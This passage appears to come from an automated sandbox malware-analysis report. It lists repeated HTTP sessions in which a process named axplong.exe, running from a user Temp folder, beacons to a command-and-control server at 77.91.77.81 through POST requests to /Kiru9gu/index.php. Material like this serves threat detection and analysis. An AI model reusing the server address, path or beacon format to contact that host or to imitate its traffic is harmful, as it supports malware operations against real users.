                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:25:15.446172953 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:25:15.672854900 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:15 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  10192.168.2.44974177.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:25:15.794337034 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:25:16.525230885 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:16 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:25:16.534236908 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:25:16.753561020 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:16 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  11192.168.2.44974377.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:25:16.871475935 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:25:17.585386038 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:17 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:25:17.799068928 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:25:18.025494099 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:17 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  12192.168.2.44974677.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:25:18.796602011 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:25:19.490165949 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:19 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:25:19.490986109 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:25:19.712841034 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:19 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  13192.168.2.44974877.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:25:19.826744080 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:25:20.539058924 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:20 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:25:20.540147066 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:25:20.758532047 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:20 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  14192.168.2.44975077.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:25:20.874248028 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:25:21.580080032 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:21 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:25:21.588300943 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:25:21.811398029 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:21 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  15192.168.2.44975177.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:25:22.551599026 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:25:23.267669916 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:23 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:25:23.268487930 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:25:23.494457960 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:23 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  16192.168.2.44975277.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:25:23.609884024 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:25:24.315927982 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:24 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:25:24.316878080 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:25:24.543057919 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:24 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  17192.168.2.44975377.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:25:24.655972004 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:25:25.364902020 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:25 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:25:25.366281986 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:25:25.589585066 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:25 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  18192.168.2.44975477.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:25:25.701524973 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:25:26.465480089 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:26 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:25:26.466460943 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:25:26.694894075 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:26 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  19192.168.2.44975577.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:25:26.811196089 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:25:27.521189928 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:27 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:25:27.651746988 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:25:27.879669905 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:27 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  20192.168.2.44975677.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:25:28.129821062 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:25:28.828418016 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:28 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:25:28.829478979 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:25:29.053596020 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:28 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  21192.168.2.44975777.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:25:29.167996883 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:25:29.863626003 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:29 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:25:29.864705086 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
